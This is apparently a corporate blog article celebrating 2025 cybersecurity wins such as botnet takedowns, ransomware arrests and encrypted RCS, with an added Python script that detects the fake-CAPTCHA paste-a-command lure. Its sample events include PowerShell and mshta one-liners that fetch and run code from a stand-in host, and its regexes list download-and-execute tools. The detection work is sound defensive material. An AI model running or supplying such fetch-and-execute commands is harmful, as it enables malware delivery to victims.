Good News in Cybersecurity

Big Wins in 2025

Dipro Prattoy
| 10/28/2025
Cybersecurity victories in 2025 include global takedowns, arrests, and new defenses that strengthen digital resilience. A Crowe specialist explains.

Headlines often focus on cyberattacks, but in 2025, the cybersecurity community celebrated big victories, from ransomware takedowns to hacktivist wins.

October is Cybersecurity Awareness Month, sponsored by the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance. This annual initiative, now in its 22nd year, focuses on helping organizations and the public raise their cybersecurity awareness, reduce risk, and address cyberthreats. In this article, a Crowe cybersecurity specialist celebrates hard-won wins in the cybersecurity community in the U.S. and globally that are helping make the digital world a safer place.

Amid breaches and ransomware headlines, 2025 delivered some major cybersecurity wins.

Scroll through your newsfeed on any given day, and you’ll likely encounter the usual topics: data breaches, ransomware demands, zero-day exploits, and terrifying headlines about digital doomsday scenarios. Cybersecurity news tends to spotlight what went wrong. But here’s the thing: Not all cybersecurity stories are about chaos. Some are about control.

While 2025 saw its fair share of midnight threat alerts and urgent incident response calls, it also saw something else: progress. Quietly but powerfully, coalitions of governments, law enforcement, tech companies, and even volunteer hacker communities banded together to push back. They dismantled threat actors’ infrastructure, made arrests, and collapsed malware rings. 2025 wasn’t just a year of fighting fires; it was a year of action and achieving outcomes for a safer, more secure world.

Following is a celebration of some of the biggest cybersecurity wins in 2025, including what’s been built, disrupted, and defended – all of which is making a positive difference in cybersecurity.


Operation Endgame 2.0: A landmark moment in botnet takedowns

One of the most celebrated wins of 2025 came through Operation Endgame 2.0, a continuation of a collaborative international law enforcement initiative that tackled some of the most notorious malware loaders in the world.

These loaders are typically the first stage of an intrusion: they establish a foothold on a victim machine and then fetch the payloads, such as ransomware or data-exfiltration tooling, that do the real damage. Across its May 2024 and May 2025 phases, the operation dismantled core infrastructure behind prominent loaders including TrickBot, Bumblebee, IcedID, and SmokeLoader, names that have appeared in threat reports for years.

The coordinated action spanned multiple countries and involved Europol, the Federal Bureau of Investigation (FBI), the Dutch National Police, and private sector partners. It resulted in arrests, infrastructure seizures, and the neutralization of key command-and-control servers. Moreover, the joint task force created AI-generated episodic updates to advertise their takedowns and discourage budding criminals.

For defenders, the value of Operation Endgame 2.0 is concrete. Taking loader infrastructure offline breaks the delivery chain that phishing campaigns depend on: a lure that reaches an inbox has nothing left to download, and loader activity drops until the operators rebuild. That disruption is temporary, which is why it complements rather than replaces endpoint protection and phishing-resistant authentication. The operation also demonstrated that international collaboration is possible, and essential, when dealing with cybercrime at scale.

Ransomware gangs shut down

In 2025, law enforcement activity targeting ransomware groups significantly increased. From affiliate arrests to infrastructure seizures, ransomware operations faced their most difficult year yet.

Key disruptions included:

  • Scattered Spider. In July, U.K. authorities made four arrests for data theft and extortion, building on related Scattered Spider arrests made in the U.S. in November 2024.
  • BlackSuit. Authorities seized BlackSuit infrastructure and halted their ransomware-as-a-service operations.
  • Hunters International. The group announced in July 2025 that it was shutting down and offered free decryption keys to its victims, ending a run of high-profile attacks on healthcare and education organizations.
  • Phobos ransomware. The U.S. Department of Justice (DOJ) charged two Russian nationals who used Phobos ransomware to target more than 1,000 public and private entities and demand more than $16.5 million in ransom payments.
  • Qakbot and DanaBot. The DOJ charged several Russian nationals in separate schemes to defraud organizations via spam bomb attacks and Qakbot and DanaBot malware.

While these efforts do not eliminate ransomware overnight, they do disrupt the flow of operations, force groups to rebuild infrastructure, and expose gaps in their affiliate models. Every successful arrest or infrastructure seizure represents a delay in attack planning, a reduction in number of victims, and a hit to the profitability of ransomware as a business.

In an environment where attackers rarely face consequences, the progress made in 2025 marks a meaningful shift in the balance.

Volunteers protecting critical infrastructure

Another encouraging development in 2025 was the growth of volunteer-based cybersecurity defense efforts in the U.S.

This year, hundreds of ethical hackers and cybersecurity professionals stepped forward to defend small and midsized water utilities that had become easy targets for cybercriminals. These volunteer efforts were part of the Cyber Resilience Corps, a nongovernmental initiative that pairs cybersecurity talent with public infrastructure operators in need of support.

From patching outdated supervisory control and data acquisition (SCADA) systems to setting up logging and alerting, these volunteers provided technical and strategic assistance that many small utilities could not otherwise afford. Several of them presented their results at the DEF CON 2025 hacker conference in Las Vegas to show how community-led cyber defense can be scaled and structured.

This shift toward community cyber defense offers a powerful message: Protection doesn't have to come from top-down regulations alone. With the right frameworks and a little coordination, communities can empower themselves to become cyber resilient against nation-state and criminal attacks.

Secure messaging: RCS and E2EE

In a quieter but equally important development, the GSM Association (GSMA) published in 2025 a new version of the rich communication services (RCS) Universal Profile that adds end-to-end encryption (E2EE), and Apple announced that it would support encrypted RCS messaging with Android users. Apple had added basic, unencrypted RCS support in 2024, so this is the step that finally brings E2EE to iPhone-to-Android messaging under an industry standard rather than a single vendor's app.

This change bridges a long-standing gap in consumer communications security. For years, iMessage and other proprietary apps encrypted messages end to end, but cross-platform SMS and early RCS traffic was protected only in transit, if at all, which left it readable to carriers and to anyone who compromised them. Once both clients run the encrypted profile, message content is protected against interception along the path. Two caveats matter in practice: E2EE does not hide who is messaging whom or when, so that metadata remains visible to the operators, and the protection applies only when both ends have updated clients, so a conversation with an older device falls back to the weaker transport-only protection.

While not directly related to corporate security, this progress in consumer privacy and data integrity has long-term implications. More awareness of encryption and secure messaging helps build better habits, especially among employees using bring-your-own-device setups.

Other notable wins worth celebrating

In addition to the headline-making takedowns and policy wins, several other developments deserve recognition for their impact on the cyberthreat landscape in 2025:

  • Interpol’s infostealer crackdown. With Operation Secure, one of the most coordinated operations of the year, Interpol successfully dismantled a global web of more than 20,000 malicious IPs and domains tied to infostealer malware. This effort significantly reduced the digital footprint of credential harvesters and disrupted access to sensitive personal and corporate data for thousands of cybercriminals.
  • LummaC2 malware disruption. In May 2025, CISA and the FBI issued advisory AA25-141B detailing the operations of LummaC2, a widely distributed information-stealing malware sold on Russian-language forums since 2022. Delivered through phishing emails, fake CAPTCHA pages that trick the user into pasting a command into the Windows Run dialog, and trojanized software, LummaC2 exfiltrates sensitive data, including credentials, multifactor authentication tokens, and crypto asset wallets. The advisory reports that from April to June 2024, more than 21,000 listings of LummaC2-stolen data appeared on cybercrime markets, a 72% increase over the same period in 2023. The advisory itself focuses on detection and mitigation guidance rather than on takedown details, but it was released alongside a coordinated disruption in which the DOJ and Microsoft seized domains used to control the malware, so defenders got both the technical indicators and a reprieve from the infrastructure at the same time.
  • BreachForums and XSS arrests. Major administrators behind popular cybercrime forums, such as BreachForums and XSS, were arrested, which led to the shutdown of platforms used for selling stolen data, malware kits, and access credentials. These forums had long enabled threat actors to monetize breaches, and their removal has sent shockwaves across the dark web.
  • Positive hacktivism: LockBit and Everest disrupted. Unidentified actors managed to breach and deface dark web infrastructure of ransomware groups, including LockBit and Everest. The attackers exposed internal negotiations, victim lists, and operational tactics, which created internal distrust and temporarily paralyzed communication among these criminal networks.
  • European Union’s new cyber resilience regulation. The EU’s Digital Operational Resilience Act (DORA), adopted in 2022, became applicable on January 17, 2025. It requires in-scope financial services organizations to protect their information and communications technology, with periodic resilience testing, incident reporting, and third-party risk management among other obligations, and it could set the standard for future legislation in other regions.
  • North Korean IT worker fraud crackdown. Law enforcement and private sector coalitions uncovered a widespread scheme where North Korean operatives posed as freelance IT workers to generate income and bypass sanctions. By identifying and removing these fake identities from major gig platforms and raiding local laptop farms, the crackdown weakened a key financial pipeline used to support illicit cyber operations by nation-state actors.
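The LummaC2 item above describes the fake-CAPTCHA lure, in which the victim is told to press Win+R and paste a command that fetches and runs the stealer. That chain leaves a recognizable trace in process-creation telemetry: a script host such as powershell.exe or mshta.exe spawned by explorer.exe (the Run dialog) or a browser, with a command line that hides its window, fetches a second stage, runs it in memory, and often carries a fake "I am not a robot" comment so the Run box looks harmless. The following is an added example of detection logic for that pattern; it is not code from the CISA/FBI advisory or from Crowe. The event layout (User, ParentImage, Image, CommandLine) is a constructed, Sysmon-like JSON format, the sample events are constructed rather than real telemetry, and the indicator patterns are an assumption drawn from public reporting of the lure rather than the advisory's own rules.

```python
"""Flag process-creation events matching the fake-CAPTCHA ("press Win+R and
paste") delivery chain used to drop infostealers such as LummaC2.

Added example, not code from the advisory or from Crowe. Event fields follow
a constructed, Sysmon-like JSON layout; indicator patterns are assumptions
drawn from public reporting of the lure, not the advisory's detection rules.
"""
import json
import re
from typing import Dict, Iterable, List

# Script hosts the lure tells the victim to launch from the Run dialog.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# A Run-dialog launch has explorer.exe as its parent; browser parents cover
# lure pages that hand the victim a downloaded script instead.
SUSPECT_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Traits of the pasted one-liner: hide the window, fetch a second stage, run it
# in memory, or append a fake verification comment. Assumed patterns; tune them
# against your own baseline before relying on them in production.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("remote_fetch", re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I)),
    ("in_memory_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta_url", re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I)),
    ("captcha_lure", re.compile(r"(?:i am not a robot|verify you are human|captcha)", re.I)),
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matched_indicators(event: Dict[str, str]) -> List[str]:
    """Names of INDICATORS whose pattern appears in the event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def is_fake_captcha_chain(event: Dict[str, str]) -> bool:
    """True when a script host is spawned from explorer/browser with lure traits.

    Parent and image are checked first so that legitimate encoded commands run
    by services or scheduled tasks (parent services.exe/svchost.exe) do not fire.
    """
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if image not in SCRIPT_HOSTS or parent not in SUSPECT_PARENTS:
        return False
    return bool(matched_indicators(event))


def scan(ndjson_lines: Iterable[str]) -> List[Dict[str, object]]:
    """Scan newline-delimited JSON events; return flagged events with reasons."""
    hits: List[Dict[str, object]] = []
    for line in ndjson_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if is_fake_captcha_chain(event):
            hits.append({
                "user": event.get("User", "?"),
                "image": _basename(event.get("Image", "")),
                "reasons": matched_indicators(event),
                "cmd": event.get("CommandLine", ""),
            })
    return hits


# Constructed sample telemetry (not real events). The first two are the lure
# chain; the third is an admin opening a console; the fourth is an agent task.
SAMPLE_EVENTS = [
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7391"'},
    {"User": "CORP\\asmith",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"User": "CORP\\itadmin", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkAA=="},
]
SAMPLE_NDJSON = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for hit in scan(SAMPLE_NDJSON):
        print(f"{hit['user']} ran {hit['image']} [{', '.join(hit['reasons'])}]: {hit['cmd']}")
```

Run against the constructed sample, the scanner flags the explorer-spawned PowerShell one-liner and the browser-spawned mshta download while leaving the plain console launch and the service-owned encoded command alone. The parent-process gate is what keeps the rule usable: encoded or hidden PowerShell is common in managed environments, but it is rarely launched interactively from the Run dialog.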

Capitalizing on wins

The cybersecurity landscape is not just defined by attacks, as events in 2025 have shown. It is also shaped by response, resilience, and cooperation. Whether through international law enforcement, government-private partnerships, or grassroots community defense, cybersecurity defenders are becoming more organized, more resourceful, and more visible.

While the threat landscape will continue to evolve and become more complex, the 2025 victories remind us that progress is possible. Cybersecurity is not just about managing risk; it is about actively shaping a safer digital future. Organizations can carry these wins forward and continue building systems that protect, empower, and enable trust, one security control at a time.
